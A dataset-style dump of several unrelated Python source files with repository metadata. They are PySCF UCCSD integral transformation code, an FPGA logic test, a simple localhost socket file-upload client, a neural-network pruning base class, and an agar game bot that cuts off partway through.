def _common_init_(self, mycc, mo_coeff=None):
if mo_coeff is None:
mo_coeff = mycc.mo_coeff
mo_idx = mycc.get_frozen_mask()
self.mo_coeff = mo_coeff = \
(mo_coeff[0][:,mo_idx[0]], mo_coeff[1][:,mo_idx[1]])
# Note: Recomputed fock matrix since SCF may not be fully converged.
dm = mycc._scf.make_rdm1(mycc.mo_coeff, mycc.mo_occ)
vhf = mycc._scf.get_veff(mycc.mol, dm)
fockao = mycc._scf.get_fock(vhf=vhf, dm=dm)
self.focka = reduce(np.dot, (mo_coeff[0].conj().T, fockao[0], mo_coeff[0]))
self.fockb = reduce(np.dot, (mo_coeff[1].conj().T, fockao[1], mo_coeff[1]))
self.fock = (self.focka, self.fockb)
self.e_hf = mycc._scf.energy_tot(dm=dm, vhf=vhf)
nocca, noccb = self.nocc = mycc.nocc
self.mol = mycc.mol
mo_ea = self.focka.diagonal().real
mo_eb = self.fockb.diagonal().real
self.mo_energy = (mo_ea, mo_eb)
gap_a = abs(mo_ea[:nocca,None] - mo_ea[None,nocca:])
gap_b = abs(mo_eb[:noccb,None] - mo_eb[None,noccb:])
if gap_a.size > 0:
gap_a = gap_a.min()
else:
gap_a = 1e9
if gap_b.size > 0:
gap_b = gap_b.min()
else:
gap_b = 1e9
if gap_a < 1e-5 or gap_b < 1e-5:
logger.warn(mycc, 'HOMO-LUMO gap (%s,%s) too small for UCCSD',
gap_a, gap_b)
return self
def get_ovvv(self, *slices):
return _get_ovvv_base(self.ovvv, *slices)
def get_ovVV(self, *slices):
return _get_ovvv_base(self.ovVV, *slices)
def get_OVvv(self, *slices):
return _get_ovvv_base(self.OVvv, *slices)
def get_OVVV(self, *slices):
return _get_ovvv_base(self.OVVV, *slices)
def _contract_VVVV_t2(self, mycc, t2, vvvv_or_direct=False, out=None, verbose=None):
if isinstance(vvvv_or_direct, np.ndarray):
vvvv = vvvv_or_direct
elif vvvv_or_direct:
vvvv = None
else:
vvvv = self.VVVV
return ccsd._contract_vvvv_t2(mycc, self.mol, vvvv, t2, out, verbose)
def _contract_vvVV_t2(self, mycc, t2, vvvv_or_direct=False, out=None, verbose=None):
if isinstance(vvvv_or_direct, np.ndarray):
vvvv = vvvv_or_direct
elif vvvv_or_direct:
vvvv = None
else:
vvvv = self.vvVV
return ccsd._contract_vvvv_t2(mycc, self.mol, vvvv, t2, out, verbose)
def _get_ovvv_base(ovvv, *slices):
if len(ovvv.shape) == 3: # DO NOT use .ndim here for h5py library
# backward compatbility
ovw = np.asarray(ovvv[slices])
nocc, nvir, nvir_pair = ovw.shape
ovvv = lib.unpack_tril(ovw.reshape(nocc*nvir,nvir_pair))
nvir1 = ovvv.shape[2]
return ovvv.reshape(nocc,nvir,nvir1,nvir1)
elif slices:
return ovvv[slices]
else:
return ovvv
def _make_eris_incore(mycc, mo_coeff=None, ao2mofn=None):
cput0 = (time.clock(), time.time())
eris = _ChemistsERIs()
eris._common_init_(mycc, mo_coeff)
nocca, noccb = mycc.nocc
nmoa, nmob = mycc.nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
moa = eris.mo_coeff[0]
mob = eris.mo_coeff[1]
nmoa = moa.shape[1]
nmob = mob.shape[1]
if callable(ao2mofn):
eri_aa = ao2mofn(moa).reshape([nmoa]*4)
eri_bb = ao2mofn(mob).reshape([nmob]*4)
eri_ab = ao2mofn((moa,moa,mob,mob))
else:
eri_aa = ao2mo.restore(1, ao2mo.full(mycc._scf._eri, moa), nmoa)
eri_bb = ao2mo.restore(1, ao2mo.full(mycc._scf._eri, mob), nmob)
eri_ab = ao2mo.general(mycc._scf._eri, (moa,moa,mob,mob), compact=False)
eri_ba = eri_ab.reshape(nmoa,nmoa,nmob,nmob).transpose(2,3,0,1)
eri_aa = eri_aa.reshape(nmoa,nmoa,nmoa,nmoa)
eri_ab = eri_ab.reshape(nmoa,nmoa,nmob,nmob)
eri_ba = eri_ba.reshape(nmob,nmob,nmoa,nmoa)
eri_bb = eri_bb.reshape(nmob,nmob,nmob,nmob)
eris.oooo = eri_aa[:nocca,:nocca,:nocca,:nocca].copy()
eris.ovoo = eri_aa[:nocca,nocca:,:nocca,:nocca].copy()
eris.ovov = eri_aa[:nocca,nocca:,:nocca,nocca:].copy()
eris.oovv = eri_aa[:nocca,:nocca,nocca:,nocca:].copy()
eris.ovvo = eri_aa[:nocca,nocca:,nocca:,:nocca].copy()
eris.ovvv = eri_aa[:nocca,nocca:,nocca:,nocca:].copy()
eris.vvvv = eri_aa[nocca:,nocca:,nocca:,nocca:].copy()
eris.OOOO = eri_bb[:noccb,:noccb,:noccb,:noccb].copy()
eris.OVOO = eri_bb[:noccb,noccb:,:noccb,:noccb].copy()
eris.OVOV = eri_bb[:noccb,noccb:,:noccb,noccb:].copy()
eris.OOVV = eri_bb[:noccb,:noccb,noccb:,noccb:].copy()
eris.OVVO = eri_bb[:noccb,noccb:,noccb:,:noccb].copy()
eris.OVVV = eri_bb[:noccb,noccb:,noccb:,noccb:].copy()
eris.VVVV = eri_bb[noccb:,noccb:,noccb:,noccb:].copy()
eris.ooOO = eri_ab[:nocca,:nocca,:noccb,:noccb].copy()
eris.ovOO = eri_ab[:nocca,nocca:,:noccb,:noccb].copy()
eris.ovOV = eri_ab[:nocca,nocca:,:noccb,noccb:].copy()
eris.ooVV = eri_ab[:nocca,:nocca,noccb:,noccb:].copy()
eris.ovVO = eri_ab[:nocca,nocca:,noccb:,:noccb].copy()
eris.ovVV = eri_ab[:nocca,nocca:,noccb:,noccb:].copy()
eris.vvVV = eri_ab[nocca:,nocca:,noccb:,noccb:].copy()
#eris.OOoo = eri_ba[:noccb,:noccb,:nocca,:nocca].copy()
eris.OVoo = eri_ba[:noccb,noccb:,:nocca,:nocca].copy()
#eris.OVov = eri_ba[:noccb,noccb:,:nocca,nocca:].copy()
eris.OOvv = eri_ba[:noccb,:noccb,nocca:,nocca:].copy()
eris.OVvo = eri_ba[:noccb,noccb:,nocca:,:nocca].copy()
eris.OVvv = eri_ba[:noccb,noccb:,nocca:,nocca:].copy()
#eris.VVvv = eri_ba[noccb:,noccb:,nocca:,nocca:].copy()
if not callable(ao2mofn):
ovvv = eris.ovvv.reshape(nocca*nvira,nvira,nvira)
eris.ovvv = lib.pack_tril(ovvv).reshape(nocca,nvira,nvira*(nvira+1)//2)
eris.vvvv = ao2mo.restore(4, eris.vvvv, nvira)
OVVV = eris.OVVV.reshape(noccb*nvirb,nvirb,nvirb)
eris.OVVV = lib.pack_tril(OVVV).reshape(noccb,nvirb,nvirb*(nvirb+1)//2)
eris.VVVV = ao2mo.restore(4, eris.VVVV, nvirb)
ovVV = eris.ovVV.reshape(nocca*nvira,nvirb,nvirb)
eris.ovVV = lib.pack_tril(ovVV).reshape(nocca,nvira,nvirb*(nvirb+1)//2)
vvVV = eris.vvVV.reshape(nvira**2,nvirb**2)
idxa = np.tril_indices(nvira)
idxb = np.tril_indices(nvirb)
eris.vvVV = lib.take_2d(vvVV, idxa[0]*nvira+idxa[1], idxb[0]*nvirb+idxb[1])
OVvv = eris.OVvv.reshape(noccb*nvirb,nvira,nvira)
eris.OVvv = lib.pack_tril(OVvv).reshape(noccb,nvirb,nvira*(nvira+1)//2)
return eris
def _make_eris_outcore(mycc, mo_coeff=None):
cput0 = (time.clock(), time.time())
eris = _ChemistsERIs()
eris._common_init_(mycc, mo_coeff)
nocca, noccb = mycc.nocc
nmoa, nmob = mycc.nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
moa = eris.mo_coeff[0]
mob = eris.mo_coeff[1]
nmoa = moa.shape[1]
nmob = mob.shape[1]
orboa = moa[:,:nocca]
orbob = mob[:,:noccb]
orbva = moa[:,nocca:]
orbvb = mob[:,noccb:]
eris.feri = lib.H5TmpFile()
eris.oooo = eris.feri.create_dataset('oooo', (nocca,nocca,nocca,nocca), 'f8')
eris.ovoo = eris.feri.create_dataset('ovoo', (nocca,nvira,nocca,nocca), 'f8')
eris.ovov = eris.feri.create_dataset('ovov', (nocca,nvira,nocca,nvira), 'f8')
eris.oovv = eris.feri.create_dataset('oovv', (nocca,nocca,nvira,nvira), 'f8')
eris.ovvo = eris.feri.create_dataset('ovvo', (nocca,nvira,nvira,nocca), 'f8')
eris.ovvv = eris.feri.create_dataset('ovvv', (nocca,nvira,nvira*(nvira+1)//2), 'f8')
#eris.vvvv = eris.feri.create_dataset('vvvv', (nvira,nvira,nvira,nvira), 'f8')
eris.OOOO = eris.feri.create_dataset('OOOO', (noccb,noccb,noccb,noccb), 'f8')
eris.OVOO = eris.feri.create_dataset('OVOO', (noccb,nvirb,noccb,noccb), 'f8')
eris.OVOV = eris.feri.create_dataset('OVOV', (noccb,nvirb,noccb,nvirb), 'f8')
eris.OOVV = eris.feri.create_dataset('OOVV', (noccb,noccb,nvirb,nvirb), 'f8')
eris.OVVO = eris.feri.create_dataset('OVVO', (noccb,nvirb,nvirb,noccb), 'f8')
eris.OVVV = eris.feri.create_dataset('OVVV', (noccb,nvirb,nvirb*(nvirb+1)//2), 'f8')
#eris.VVVV = eris.feri.create_dataset('VVVV', (nvirb,nvirb,nvirb,nvirb), 'f8')
eris.ooOO = eris.feri.create_dataset('ooOO', (nocca,nocca,noccb,noccb), 'f8')
eris.ovOO = eris.feri.create_dataset('ovOO', (nocca,nvira,noccb,noccb), 'f8')
eris.ovOV = eris.feri.create_dataset('ovOV', (nocca,nvira,noccb,nvirb), 'f8')
eris.ooVV = eris.feri.create_dataset('ooVV', (nocca,nocca,nvirb,nvirb), 'f8')
eris.ovVO = eris.feri.create_dataset('ovVO', (nocca,nvira,nvirb,noccb), 'f8')
eris.ovVV = eris.feri.create_dataset('ovVV', (nocca,nvira,nvirb*(nvirb+1)//2), 'f8')
#eris.vvVV = eris.feri.create_dataset('vvVV', (nvira,nvira,nvirb,nvirb), 'f8')
eris.OVoo = eris.feri.create_dataset('OVoo', (noccb,nvirb,nocca,nocca), 'f8')
eris.OOvv = eris.feri.create_dataset('OOvv', (noccb,noccb,nvira,nvira), 'f8')
eris.OVvo = eris.feri.create_dataset('OVvo', (noccb,nvirb,nvira,nocca), 'f8')
eris.OVvv = eris.feri.create_dataset('OVvv', (noccb,nvirb,nvira*(nvira+1)//2), 'f8')
cput1 = time.clock(), time.time()
mol = mycc.mol
# <ij||pq> = <ij|pq> - <ij|qp> = (ip|jq) - (iq|jp)
tmpf = lib.H5TmpFile()
if nocca > 0:
ao2mo.general(mol, (orboa,moa,moa,moa), tmpf, 'aa')
buf = np.empty((nmoa,nmoa,nmoa))
for i in range(nocca):
lib.unpack_tril(tmpf['aa'][i*nmoa:(i+1)*nmoa], out=buf)
eris.oooo[i] = buf[:nocca,:nocca,:nocca]
eris.ovoo[i] = buf[nocca:,:nocca,:nocca]
eris.ovov[i] = buf[nocca:,:nocca,nocca:]
eris.oovv[i] = buf[:nocca,nocca:,nocca:]
eris.ovvo[i] = buf[nocca:,nocca:,:nocca]
eris.ovvv[i] = lib.pack_tril(buf[nocca:,nocca:,nocca:])
del(tmpf['aa'])
if noccb > 0:
buf = np.empty((nmob,nmob,nmob))
ao2mo.general(mol, (orbob,mob,mob,mob), tmpf, 'bb')
for i in range(noccb):
lib.unpack_tril(tmpf['bb'][i*nmob:(i+1)*nmob], out=buf)
eris.OOOO[i] = buf[:noccb,:noccb,:noccb]
eris.OVOO[i] = buf[noccb:,:noccb,:noccb]
eris.OVOV[i] = buf[noccb:,:noccb,noccb:]
eris.OOVV[i] = buf[:noccb,noccb:,noccb:]
eris.OVVO[i] = buf[noccb:,noccb:,:noccb]
eris.OVVV[i] = lib.pack_tril(buf[noccb:,noccb:,noccb:])
del(tmpf['bb'])
if nocca > 0:
buf = np.empty((nmoa,nmob,nmob))
ao2mo.general(mol, (orboa,moa,mob,mob), tmpf, 'ab')
for i in range(nocca):
lib.unpack_tril(tmpf['ab'][i*nmoa:(i+1)*nmoa], out=buf)
eris.ooOO[i] = buf[:nocca,:noccb,:noccb]
eris.ovOO[i] = buf[nocca:,:noccb,:noccb]
eris.ovOV[i] = buf[nocca:,:noccb,noccb:]
eris.ooVV[i] = buf[:nocca,noccb:,noccb:]
eris.ovVO[i] = buf[nocca:,noccb:,:noccb]
eris.ovVV[i] = lib.pack_tril(buf[nocca:,noccb:,noccb:])
del(tmpf['ab'])
if noccb > 0:
buf = np.empty((nmob,nmoa,nmoa))
ao2mo.general(mol, (orbob,mob,moa,moa), tmpf, 'ba')
for i in range(noccb):
lib.unpack_tril(tmpf['ba'][i*nmob:(i+1)*nmob], out=buf)
eris.OVoo[i] = buf[noccb:,:nocca,:nocca]
eris.OOvv[i] = buf[:noccb,nocca:,nocca:]
eris.OVvo[i] = buf[noccb:,nocca:,:nocca]
eris.OVvv[i] = lib.pack_tril(buf[noccb:,nocca:,nocca:])
del(tmpf['ba'])
buf = None
cput1 = logger.timer_debug1(mycc, 'transforming oopq, ovpq', *cput1)
if not mycc.direct:
ao2mo.full(mol, orbva, eris.feri, dataname='vvvv')
ao2mo.full(mol, orbvb, eris.feri, dataname='VVVV')
ao2mo.general(mol, (orbva,orbva,orbvb,orbvb), eris.feri, dataname='vvVV')
eris.vvvv = eris.feri['vvvv']
eris.VVVV = eris.feri['VVVV']
eris.vvVV = eris.feri['vvVV']
cput1 = logger.timer_debug1(mycc, 'transforming vvvv', *cput1)
return eris
def make_tau(t2, t1, r1, fac=1, out=None):
t1a, t1b = t1
r1a, r1b = r1
tau1aa = make_tau_aa(t2[0], t1a, r1a, fac, out)
tau1bb = make_tau_aa(t2[2], t1b, r1b, fac, out)
tau1ab = make_tau_ab(t2[1], t1, r1, fac, out)
return tau1aa, tau1ab, tau1bb
def make_tau_aa(t2aa, t1a, r1a, fac=1, out=None):
tau1aa = np.einsum('ia,jb->ijab', t1a, r1a)
tau1aa-= np.einsum('ia,jb->jiab', t1a, r1a)
tau1aa = tau1aa - tau1aa.transpose(0,1,3,2)
tau1aa *= fac * .5
tau1aa += t2aa
return tau1aa
def make_tau_ab(t2ab, t1, r1, fac=1, out=None):
t1a, t1b = t1
r1a, r1b = r1
tau1ab = np.einsum('ia,jb->ijab', t1a, r1b)
tau1ab+= np.einsum('ia,jb->ijab', r1a, t1b)
tau1ab *= fac * .5
tau1ab += t2ab
return tau1ab
def _fp(nocc, nmo):
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa - nocca, nmob - noccb
# vvvv
fp = nocca**2 * nvira**4
fp += noccb**2 * nvirb**4
fp += nocca * nvira**2 * noccb * nvirb**2 * 2
# ovvv
fp += nocca**2 * nvira**3 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**3 * nvira**2 * 2
# OVVV
fp += noccb**2 * nvirb**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**3 * nvirb**2 * 2
# ovVV
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * nvirb**2 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
# OVvv
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**4 * nvira * 2
fp += nocca**4 * nvira**2 * 2
fp += nocca**4 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**2 * nvira**3 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**4 * nvirb * 2
fp += noccb**4 * nvirb**2 * 2
fp += noccb**4 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**2 * nvirb**3 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**2 * nvirb**2 * nocca * nvira * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nocca * nvira**2 * 2
fp += nocca**2 * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb**2 * 2
fp += nocca**2 * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb**2 * nvirb * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * noccb * nvirb**2 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += noccb**2 * nocca * nvira**2 * 2
fp += noccb**2 * nvirb * nocca * nvira * 2
fp += nocca**3 * nvira**3 * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += noccb**3 * nvirb**3 * 2
fp += noccb**2 * nvirb**2 * nocca * nvira * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb**2 * 2
fp += nocca * nvira**2 * noccb**2 * nvirb * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**2 * nvira**2 * noccb * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb**2 * 2
fp += nocca**2 * nvira**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += nocca * nvira * noccb * nvirb**2 * 2
fp += nocca * nvira**2 * noccb * nvirb * 2
fp += nocca**3 * nvira**2 * 2
fp += noccb**3 * nvirb**2 * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca**2 * nvira**3 * 2
fp += noccb**2 * nvirb**3 * 2
fp += nocca**2 * nvira * noccb * nvirb * 2
fp += nocca * nvira * noccb**2 * nvirb * 2
return fp
if __name__ == '__main__':
import copy
from pyscf import scf
from pyscf import gto
mol = gto.Mole()
mol.atom = [['O', (0., 0., 0.)],
['O', (1.21, 0., 0.)]]
mol.basis = 'cc-pvdz'
mol.spin = 2
mol.build()
mf = scf.UHF(mol).run()
# Freeze 1s electrons
# also acceptable
#frozen = 4 or [2,2]
frozen = [[0,1], [0,1]]
ucc = UCCSD(mf, frozen=frozen)
eris = ucc.ao2mo()
ecc, t1, t2 = ucc.kernel(eris=eris)
print(ecc - -0.3486987472235819)
mol = gto.Mole()
mol.atom = [
[8 , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]]
mol.basis = 'cc-pvdz'
mol.spin = 0
mol.build()
mf = scf.UHF(mol).run()
mycc = UCCSD(mf)
mycc.direct = True
ecc, t1, t2 = mycc.kernel()
print(ecc - -0.2133432712431435)
print(mycc.ccsd_t() - -0.003060021865720902)
e,v = mycc.ipccsd(nroots=8)
print(e[0] - 0.4335604332073799)
print(e[2] - 0.5187659896045407)
print(e[4] - 0.6782876002229172)
e,v = mycc.eaccsd(nroots=8)
print(e[0] - 0.16737886338859731)
print(e[2] - 0.24027613852009164)
print(e[4] - 0.51006797826488071)
e,v = mycc.eeccsd(nroots=4)
print(e[0] - 0.2757159395886167)
print(e[1] - 0.2757159395886167)
print(e[2] - 0.2757159395886167)
print(e[3] - 0.3005716731825082)
| 40.765991
| 89
| 0.586085
|
794e3018387494cb970c47ef0cdd929c7b8e2cb4
| 304
|
py
|
Python
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 14
|
2017-10-08T09:16:10.000Z
|
2021-11-27T19:12:24.000Z
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 7
|
2018-04-12T21:33:49.000Z
|
2018-08-21T22:14:20.000Z
|
tests/test_mantle/logic/mothball/reduceand2.py
|
splhack/loam
|
10b08bd622b7cfd63eabaec4729f6238e4521b30
|
[
"MIT"
] | 3
|
2018-07-24T04:55:02.000Z
|
2019-12-30T08:12:39.000Z
|
from magma import wire, compile, EndCircuit
from mantle import And
from loam.boards.icestick import IceStick
icestick = IceStick()
for i in range(2):
icestick.J1[i].input().on()
icestick.D5.on()
main = icestick.main()
and2 = And(2)
and2(main.J1[0], main.J1[1])
wire(and2.O, main.D5)
EndCircuit()
| 17.882353
| 43
| 0.710526
|
794e309d5486036756cef688f28de112279e3e04
| 718
|
py
|
Python
|
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
day6/ftp-client.py
|
water-liu/automation
|
0a94b8e311f037a5624c3f376dcfdf67d8577dea
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# _*_coding:utf-8_*_
import socket
import sys
import os
ip_port = ('127.0.0.1', 9999)
sk = socket.socket()
sk.connect(ip_port)
container = {'key': '', 'data': ''}
while True:
inputdata = input('path:')
cmd, path = inputdata.split('|')
file_name = os.path.basename(path)
file_size = os.stat(path).st_size
sk.send((cmd + "|" + file_name + '|' + str(file_size)).encode())
send_size = 0
f = open(path, 'rb')
Flag = True
while Flag:
if send_size + 1024 > file_size:
data = f.read(file_size - send_size)
Flag = False
else:
data = f.read(1024)
send_size += 1024
sk.send(data)
f.close()
| 21.757576
| 68
| 0.559889
|
794e30d3827e430bc8665628c3220c37eb57d24c
| 6,545
|
py
|
Python
|
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
pruning/abstract.py
|
garion9013/shrinkbench
|
c460cbc371ef2673b2a3f8498ca7a8aeb60d78bb
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from collections import OrderedDict
import numpy as np
import pandas as pd
from .mask import mask_module
from .modules import MaskedModule
from .utils import get_params
import tempfile, pathlib
import torch
class Pruning(ABC):
"""Base class for Pruning operations
"""
def __init__(self, model, inputs=None, outputs=None, **pruning_params):
"""Construct Pruning class
Passed params are set as attributes for convienence and
saved internally for __repr__
Arguments:
model {torch.nn.Module} -- Model for which to compute masks
inputs {torch.nn.Tensor} -- Sample inputs to estimate activation &| gradients
outputs {torch.nn.Tensor} -- Sample outputs to estimate activation &| gradients
Keyword Arguments:
**pruning_params {dict} -- [description]
"""
self.model = model
self.inputs = inputs
self.outputs = outputs
self.pruning_params = list(pruning_params.keys())
for k, v in pruning_params.items():
setattr(self, k, v)
if hasattr(self, "scheduler") and isinstance(self.scheduler, type):
self.scheduler_gen = self.scheduler(self, **self.scheduler_args)
@abstractmethod
def model_masks(self, prunable=None):
"""Compute masks for a given model
"""
# TODO Also accept a dataloader
pass
# return masks
def update_context(self, step):
# Update prunable parameters after backward pass
if hasattr(self, "scheduler_gen"):
# from generator class (stateful)
sparsity, next_waiting_steps = self.scheduler_gen.next(step)
elif hasattr(self, "scheduler"):
# from generator fn (stateless)
sparsity, next_waiting_steps = self.scheduler(self, step=step, **self.scheduler_args)
else:
raise AttributeError("Scheduler fn/obj is required to determine pruning step and amount")
self.compression = 1/(1-sparsity)
assert self.compression >= 1, "Unacceptable compression rate"
self.init(self.compression)
return next_waiting_steps
def apply(self, step):
next_waiting_steps = self.update_context(step)
masks = self.model_masks()
mask_module(self.model, masks)
return next_waiting_steps
@abstractmethod
def can_prune(self, module):
pass
def prunable_modules(self):
prunable = [module for module in self.model.modules() if self.can_prune(module)]
return prunable
def prunable_keys(self):
prunables = self.prunable_modules()
prunable_keys = []
for name, module in self.model.named_modules():
if module in prunables:
# Assuring prunable layer always have weight and bias
prunable_keys.append(name+".weight")
prunable_keys.append(name+".bias")
return prunable_keys
def capture_params(self, steps, only_prunable=True):
self._handle = tempfile.TemporaryDirectory()
tmp_path = pathlib.Path(self._handle.name)
tmp_path.mkdir(exist_ok=True, parents=True)
self.params_snapshot_path = tmp_path / f"{self.model.__class__.__name__}.{steps}"
params = self.model.state_dict()
if only_prunable:
params = dict(filter(lambda kv: kv[0] in self.prunable_keys(), params.items()))
torch.save({"model_state_dict":params}, self.params_snapshot_path)
# def weight_diff_norm(self):
# assert hasattr(self, "weights_path"), "Should be loaded with a pretrained model in advance"
#
# weights = torch.load(self.weights_path)["model_state_dict"]
# if list(weights.keys())[0].startswith('module.'):
# weights = {k[len("module."):]: v for k, v in weights.items()}
# self.load_state_dict(weights, strict=False)
# for k,v in weights.items():
# delta =
def reset_params(self):
assert hasattr(self, "params_snapshot_path"), "No saved model path (by self.captured_weights)"
weights = torch.load(self.params_snapshot_path)["model_state_dict"]
if list(weights.keys())[0].startswith('module.'):
weights = {k[len("module."):]: v for k, v in weights.items()}
self.model.load_state_dict(weights, strict=False)
def __repr__(self):
s = f"{self.__class__.__name__}("
for k in self.pruning_params:
s += f"{k}={repr(getattr(self, k))}, "
s = s[:-2] + ')'
return s
def __str__(self):
return repr(self)
def module_params(self, module):
return get_params(module)
def params(self, only_prunable=True, native=False):
if only_prunable:
return {module: get_params(module, native=native) for module in self.prunable}
else:
return {module: get_params(module, native=native) for module in self.model.modules()}
def summary(self):
rows = []
for name, module in self.model.named_modules():
for pname, param in module.named_parameters(recurse=False):
if isinstance(module, MaskedModule):
compression = 1/getattr(module, pname+'_mask').detach().cpu().numpy().mean()
else:
compression = 1
shape = param.detach().cpu().numpy().shape
rows.append([name, pname, compression, np.prod(shape), shape, self.can_prune(module)])
columns = ['module', 'param', 'comp', 'size', 'shape', 'prunable']
return pd.DataFrame(rows, columns=columns)
class LayerPruning(Pruning):
@abstractmethod
def layer_masks(self, module):
"""Instead of implementing masks for the entire model at once
User needs to specify a layer_masks fn that can be applied layerwise
Should return None is layer can't be masked
"""
pass
# return masks
def model_masks(self, prunable=None):
"""Compute masks using the said strategy for every module
This is a straight forward implementation that supports
strategies that prune each module independently
"""
masks = OrderedDict()
if prunable is None:
prunable = self.prunable_modules()
for module in prunable:
masks_ = self.layer_masks(module)
if masks_ is not None:
masks[module] = masks_
return masks
| 36.361111
| 102
| 0.628266
|
794e31ecc19277789a85f1457df975b39a845b96
| 12,473
|
py
|
Python
|
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
pettingzoo/agar/players/Bot.py
|
footoredo/PettingZoo
|
b48baf9ca459d72cdcb7013ef86c5fc470856081
|
[
"MIT"
] | null | null | null |
from pettingzoo.agar.players.Player import Player
import numpy as np
from pettingzoo.agar.modules import *
from pettingzoo.agar.entity.Cell import Cell
import random
from copy import deepcopy
import numpy as np
class Bot(Player):
def __init__(self, gameServer, name='bot', id = None, pos = None):
super().__init__(gameServer, name, id, pos)
self.np_random = gameServer.np_random
assert self.np_random is not None
self.actionCooldown = 0
self.splitCooldown = 0
self.actionstamp = np.zeros(4)
def step(self, *kargs, **kwargs):
if len(self.cells) == 0:
self.isRemoved = True
if self.isRemoved:
return
if self.actionCooldown:
self.action[2] = 2
self.actionCooldown -= 1
self.action[:2] = self.actionstamp[:2]
return
self.actionCooldown = 5 # action_repeat=5
if self.splitCooldown:
self.splitCooldown -= 1
if self.np_random.rand() < 0.:
self.peace_step()
else:
self.aggressive_step()
self.mouse = self.centerPos.add(Vec2(self.action[0] * self.gameServer.config.serverViewBaseX, self.action[1] * self.gameServer.config.serverViewBaseY), 1)
if self.action[2] == 0:
self.pressSpace()
elif self.action[2] == 1:
self.pressW()
elif self.action[2] == 2:
pass
def peace_step(self):
visible_food = []
visible_virus = []
action = np.zeros(3)
has_enemy = False
for cell in self.viewNodes:
